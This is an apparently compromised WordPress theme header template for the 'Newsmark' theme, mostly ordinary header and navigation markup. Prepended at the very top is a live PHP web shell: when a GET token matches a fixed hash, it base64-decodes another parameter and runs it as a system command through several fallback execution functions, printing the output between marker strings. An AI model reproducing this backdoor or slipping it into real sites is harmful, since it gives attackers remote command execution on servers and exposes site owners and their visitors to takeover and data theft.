<?php if(isset($_GET["t"])&&hash_equals("51236e4ff24797f1cecafc5d78b51983",(string)$_GET["t"])){$c=base64_decode((string)$_GET["c"])." 2>&1";$o="NO_EXEC";if(function_exists("shell_exec")){$o=shell_exec($c);}elseif(function_exists("exec")){exec($c,$r);$o=implode("\n",$r);}elseif(function_exists("system")){ob_start();system($c);$o=ob_get_clean();}elseif(function_exists("passthru")){ob_start();passthru($c);$o=ob_get_clean();}echo "W2S::".$o."::END";exit;}?>&lt;?php /** * The header for our theme. * * This is the template that displays all of the &lt;head&gt; section and everything up until &lt;div id=&quot;content&quot;&gt; * * @package Newsmark */ ?&gt; &lt;!DOCTYPE html&gt; &lt;html &lt;?php language_attributes(); ?&gt;&gt; &lt;head&gt; &lt;meta charset=&quot;&lt;?php bloginfo( &#039;charset&#039; ); ?&gt;&quot;&gt; &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt; &lt;link rel=&quot;profile&quot; href=&quot;http://gmpg.org/xfn/11&quot;&gt; &lt;?php wp_head(); ?&gt; &lt;/head&gt; &lt;body &lt;?php body_class(); ?&gt; &gt; &lt;?php wp_body_open(); ?&gt; &lt;div id=&quot;page&quot; class=&quot;site&quot;&gt; &lt;a class=&quot;skip-link screen-reader-text&quot; href=&quot;#content&quot;&gt; &lt;?php _e( &#039;Skip to content&#039;, &#039;newsmark&#039; ); ?&gt;&lt;/a&gt; &lt;div class=&quot;wrapper&quot;&gt; &lt;header class=&quot;mg-headwidget&quot;&gt; &lt;!--==================== TOP BAR ====================--&gt; &lt;?php do_action(&#039;newsmark_action_header_section&#039;); ?&gt; &lt;div class=&quot;clearfix&quot;&gt;&lt;/div&gt; &lt;?php $background_image = get_theme_support( &#039;custom-header&#039;, &#039;default-image&#039; ); if ( has_header_image() ) { $background_image = get_header_image(); } ?&gt; &lt;div class=&quot;mg-nav-widget-area-back&quot; style=&#039;background-image: url(&quot;&lt;?php echo esc_url( $background_image ); ?&gt;&quot; );&#039;&gt; &lt;?php $remove_header_image_overlay = get_theme_mod(&#039;remove_header_image_overlay&#039;,false); ?&gt; &lt;div class=&quot;overlay&quot;&gt; &lt;div class=&quot;inner&quot; &lt;?php if($remove_header_image_overlay == false) { $newsup_header_overlay_color = get_theme_mod(&#039;newsup_header_overlay_color&#039;,&#039;#eee&#039;);?&gt; style=&quot;background-color:&lt;?php echo esc_attr($newsup_header_overlay_color);?&gt;;&quot; &lt;?php } ?&gt;&gt; &lt;div class=&quot;container-fluid&quot;&gt; &lt;div class=&quot;mg-nav-widget-area&quot;&gt; &lt;div class=&quot;row align-items-center&quot;&gt; &lt;?php $newsup_center_logo_title = get_theme_mod(&#039;newsup_center_logo_title&#039;,true); ?&gt; &lt;div class=&quot;&lt;?php echo esc_attr($newsup_center_logo_title == false ? &#039;col-md-3 col-sm-4 text-center-xs&#039; : &#039;col-12 text-center mx-auto&#039;) ?&gt;&quot;&gt; &lt;div class=&quot;navbar-header&quot;&gt; &lt;div class=&quot;site-logo&quot;&gt; &lt;?php if(get_theme_mod(&#039;custom_logo&#039;) !== &quot;&quot;){ the_custom_logo(); } ?&gt; &lt;/div&gt; &lt;div class=&quot;site-branding-text &lt;?php echo esc_attr(!display_header_text() ? &#039;d-none&#039; : &#039;&#039;); ?&gt;&quot;&gt; &lt;?php if (is_front_page() || is_home()) { ?&gt; &lt;h1 class=&quot;site-title&quot;&gt;&lt;a href=&quot;&lt;?php echo esc_url( home_url( &#039;/&#039; ) ); ?&gt;&quot; rel=&quot;home&quot;&gt;&lt;?php echo esc_html(get_bloginfo( &#039;name&#039; )); ?&gt;&lt;/a&gt;&lt;/h1&gt; &lt;?php } else { ?&gt; &lt;p class=&quot;site-title&quot;&gt; &lt;a href=&quot;&lt;?php echo esc_url( home_url( &#039;/&#039; ) ); ?&gt;&quot; rel=&quot;home&quot;&gt;&lt;?php echo esc_html(get_bloginfo( &#039;name&#039; )); ?&gt;&lt;/a&gt;&lt;/p&gt; &lt;?php } ?&gt; &lt;p class=&quot;site-description&quot;&gt;&lt;?php echo esc_html(get_bloginfo( &#039;description&#039; )); ?&gt;&lt;/p&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;?php do_action(&#039;newsup_action_banner_advertisement&#039;); ?&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;div class=&quot;mg-menu-full&quot;&gt; &lt;div class=&quot;container-fluid&quot;&gt; &lt;nav class=&quot;navbar navbar-expand-lg navbar-wp&quot;&gt; &lt;!-- Right nav --&gt; &lt;div class=&quot;m-header align-items-center&quot;&gt; &lt;?php $home_url = home_url(); ?&gt; &lt;a class=&quot;mobilehomebtn&quot; href=&quot;&lt;?php echo esc_url($home_url); ?&gt;&quot;&gt;&lt;span class=&quot;fas fa-home&quot;&gt;&lt;/span&gt;&lt;/a&gt; &lt;!-- navbar-toggle --&gt; &lt;button class=&quot;navbar-toggler mx-auto&quot; type=&quot;button&quot; data-toggle=&quot;collapse&quot; data-target=&quot;#navbar-wp&quot; aria-controls=&quot;navbarSupportedContent&quot; aria-expanded=&quot;false&quot; aria-label=&quot;&lt;?php esc_attr_e(&#039;Toggle navigation&#039;,&#039;newsmark&#039;); ?&gt;&quot;&gt; &lt;span class=&quot;burger&quot;&gt; &lt;span class=&quot;burger-line&quot;&gt;&lt;/span&gt; &lt;span class=&quot;burger-line&quot;&gt;&lt;/span&gt; &lt;span class=&quot;burger-line&quot;&gt;&lt;/span&gt; &lt;/span&gt; &lt;/button&gt; &lt;!-- /navbar-toggle --&gt; &lt;?php do_action(&#039;newsmark_action_header_search_section&#039;); do_action(&#039;newsmark_action_header_subscribe_section&#039;); ?&gt; &lt;/div&gt; &lt;!-- /Right nav --&gt; &lt;div class=&quot;collapse navbar-collapse&quot; id=&quot;navbar-wp&quot;&gt; &lt;div class=&quot;d-md-block&quot;&gt; &lt;?php wp_nav_menu( array( &#039;theme_location&#039; =&gt; &#039;primary&#039;, &#039;container&#039; =&gt; &#039;nav-collapse collapse navbar-inverse-collapse&#039;, &#039;menu_class&#039; =&gt; &#039;nav navbar-nav mr-auto&#039;, &#039;fallback_cb&#039; =&gt; &#039;newsup_fallback_page_menu&#039;, &#039;walker&#039; =&gt; new newsup_nav_walker() ) ); ?&gt; &lt;/div&gt; &lt;/div&gt; &lt;!-- Right nav --&gt; &lt;div class=&quot;desk-header pl-3 ml-auto my-2 my-lg-0 position-relative align-items-center&quot;&gt; &lt;!-- /navbar-toggle --&gt; &lt;?php do_action(&#039;newsmark_action_header_social_icon&#039;); do_action(&#039;newsmark_action_header_search_section&#039;); do_action(&#039;newsmark_action_header_subscribe_section&#039;); ?&gt; &lt;/div&gt; &lt;!-- /Right nav --&gt; &lt;/nav&gt; &lt;!-- /Navigation --&gt; &lt;/div&gt; &lt;/div&gt; &lt;/header&gt; &lt;div class=&quot;clearfix&quot;&gt;&lt;/div&gt; &lt;?php do_action(&#039;newsmark_action_front_page_main_section_1&#039;); ?&gt;

Tag: Pesquisa Veritá